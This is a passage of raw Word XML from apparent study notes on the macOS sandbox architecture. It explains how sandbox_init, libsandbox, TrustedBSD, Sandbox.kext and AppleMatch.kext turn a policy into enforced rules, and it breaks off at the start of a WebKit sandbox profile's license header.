        <w:t>In this diagram, dark boxes denote closed source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>components, while light boxes denote open source components.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003529D1" w:rsidRDefault="003529D1" w:rsidP="00A27E5A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0044636D" w:rsidRDefault="003529D1" w:rsidP="0044636D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>Sandboxing an application begins with a call to the system function</w:t>
      </w:r>
      <w:r w:rsidRPr="003529D1">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003529D1">
        <w:rPr>
          <w:rFonts w:ascii="CMTT10" w:hAnsi="CMTT10" w:cs="CMTT10"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>sandbox</w:t>
      </w:r>
      <w:r w:rsidRPr="003529D1">
        <w:rPr>
          <w:rFonts w:ascii="CMTT10" w:hAnsi="CMTT10" w:cs="CMTT10" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="003529D1">
        <w:rPr>
          <w:rFonts w:ascii="CMTT10" w:hAnsi="CMTT10" w:cs="CMTT10"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">.This function uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="0044636D">
        <w:rPr>
          <w:rFonts w:ascii="CMTT10" w:hAnsi="CMTT10" w:cs="CMTT10"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>libsandbox.dylib</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMTT10" w:hAnsi="CMTT10" w:cs="CMTT10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">library to </w:t>
      </w:r>
      <w:r w:rsidR="0044636D">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>turn</w:t>
      </w:r>
      <w:r w:rsidR="0044636D" w:rsidRPr="0044636D">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> a human readable policy</w:t>
      </w:r>
      <w:r w:rsidR="0044636D">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve"> de</w:t>
      </w:r>
      <w:r w:rsidR="0044636D">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fi</w:t>
      </w:r>
      <w:r w:rsidR="0044636D">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>ni</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">tion (describing rules like \don't allow access to _les under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMTT10" w:hAnsi="CMTT10" w:cs="CMTT10"/>
        </w:rPr>
        <w:t>/opt/sekret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
      <w:r w:rsidR="0044636D">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve"> into a binary</w:t>
      </w:r>
      <w:r w:rsidR="0044636D">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>format for the kernel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0044636D" w:rsidRDefault="003529D1" w:rsidP="003529D1">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve"> This binary format is passed to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMTT10" w:hAnsi="CMTT10" w:cs="CMTT10"/>
        </w:rPr>
        <w:t xml:space="preserve">mac syscall </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>system call handled</w:t>
      </w:r>
      <w:r w:rsidR="0044636D">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">by the </w:t>
      </w:r>
      <w:r w:rsidRPr="0044636D">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>TrustedBSD subsystem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>. TrustedBSD will pass the sandbox initialization request</w:t>
      </w:r>
      <w:r w:rsidR="0044636D">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">to the </w:t>
      </w:r>
      <w:r w:rsidRPr="0044636D">
        <w:rPr>
          <w:rFonts w:ascii="CMTT10" w:hAnsi="CMTT10" w:cs="CMTT10"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Sandbox.kext </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">kernel extension for processing. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003529D1" w:rsidRDefault="003529D1" w:rsidP="0044636D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>The kernel extension will install the</w:t>
      </w:r>
      <w:r w:rsidR="0044636D">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0044636D">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>sandbox pro</w:t>
      </w:r>
      <w:r w:rsidR="0044636D">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>le rules for the current process. Upon completion, a success return value will</w:t>
      </w:r>
      <w:r w:rsidR="0044636D">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">be </w:t>
      </w:r>
      <w:r w:rsidRPr="0044636D">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          <w:b/>
        </w:rPr>
        <w:t>passed back</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve"> out of the kernel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E7A42" w:rsidRDefault="003529D1" w:rsidP="002E7A42">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>Once the sandbox is initialized, function calls hooked by the TrustedBSD layer will pass</w:t>
      </w:r>
      <w:r w:rsidR="002E7A42">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">through </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMTT10" w:hAnsi="CMTT10" w:cs="CMTT10"/>
        </w:rPr>
        <w:t xml:space="preserve">Sandbox.kext </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A42">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>policy enforcement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>. Depending on the system call, the extension</w:t>
      </w:r>
      <w:r w:rsidR="002E7A42">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>will consult the list of rules for the current process. Some rules (such as the example given</w:t>
      </w:r>
      <w:r w:rsidR="002E7A42">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">above denying access to </w:t>
      </w:r>
      <w:r w:rsidR="002E7A42">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">les under the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMTT10" w:hAnsi="CMTT10" w:cs="CMTT10"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/sekret </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">path) will require </w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A42">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>pattern matching</w:t>
      </w:r>
      <w:r w:rsidR="002E7A42" w:rsidRPr="002E7A42">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">support. </w:t>
      </w:r>
      <w:r w:rsidR="002E7A42">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E7A42" w:rsidRDefault="003529D1" w:rsidP="003529D1">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E7A42">
        <w:rPr>
          <w:rFonts w:ascii="CMTT10" w:hAnsi="CMTT10" w:cs="CMTT10"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Sandbox.kext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMTT10" w:hAnsi="CMTT10" w:cs="CMTT10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">imports functions from </w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A42">
        <w:rPr>
          <w:rFonts w:ascii="CMTT10" w:hAnsi="CMTT10" w:cs="CMTT10"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>AppleMatch.kext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMTT10" w:hAnsi="CMTT10" w:cs="CMTT10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E7A42">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>to perform regular ex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>pression matching on the system call argument and the policy rule that is being checked.</w:t>
      </w:r>
      <w:r w:rsidR="002E7A42">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E7A42">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>For example, does the</w:t>
      </w:r>
      <w:r w:rsidR="002E7A42">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> fi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">le being read match the denied path </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMTT10" w:hAnsi="CMTT10" w:cs="CMTT10"/>
        </w:rPr>
        <w:t>/opt/sekret/.*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003529D1" w:rsidRPr="00A27E5A" w:rsidRDefault="003529D1" w:rsidP="003529D1">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>The other</w:t>
      </w:r>
      <w:r w:rsidR="002E7A42">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>small part of the system are the Mach messages used to carry tracing information (such as</w:t>
      </w:r>
      <w:r w:rsidR="002E7A42">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>which operations are being checked) back to user</w:t>
      </w:r>
      <w:r w:rsidR="002E7A42">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>space</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A42">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> for logging.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A27E5A" w:rsidRPr="006B4005" w:rsidRDefault="00A27E5A" w:rsidP="00A27E5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="_Toc445313323"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Trust</w:t>
      </w:r>
      <w:r w:rsidR="00C71DE6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BSD</w:t>
      </w:r>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:p w:rsidR="00A27E5A" w:rsidRDefault="00A27E5A" w:rsidP="0014464C"/>
    <w:p w:rsidR="00A06688" w:rsidRDefault="00302E7E" w:rsidP="006347F7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="_Toc445313324"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sandbox profile</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
    </w:p>
    <w:p w:rsidR="006347F7" w:rsidRPr="00A06688" w:rsidRDefault="006347F7" w:rsidP="00A06688">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A06688">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/System/Library/Sandbox/Profiles/*.sb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006347F7" w:rsidRPr="006B4005" w:rsidRDefault="006347F7" w:rsidP="006347F7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="123" w:name="_Toc445313325"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Application profile</w:t>
      </w:r>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:p w:rsidR="00EF5B46" w:rsidRDefault="00EF5B46" w:rsidP="0014464C"/>
    <w:p w:rsidR="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="0014464C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*.sb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF5B46" w:rsidRPr="00302E7E" w:rsidRDefault="00EF5B46" w:rsidP="0014464C">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\WebKit2-7600.1.25\Resources\SandboxProfiles\ios</w:t>
      </w:r>
      <w:r w:rsidR="00302E7E" w:rsidRPr="00302E7E">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="00302E7E" w:rsidRPr="00302E7E">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t xml:space="preserve"> com.apple.WebKit.WebContent.sb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>; Copyright (C) 2010, 2011, 2012, 2013, 2014 Apple Inc. All rights reserved.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>; Redistribution and use in source and binary forms, with or without</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>; modification, are permitted provided that the following conditions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>; are met:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>; 1. Redistributions of source code must retain the above copyright</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>; notice, this list of conditions and the following disclaimer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>; 2. Redistributions in binary form must reproduce the above copyright</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
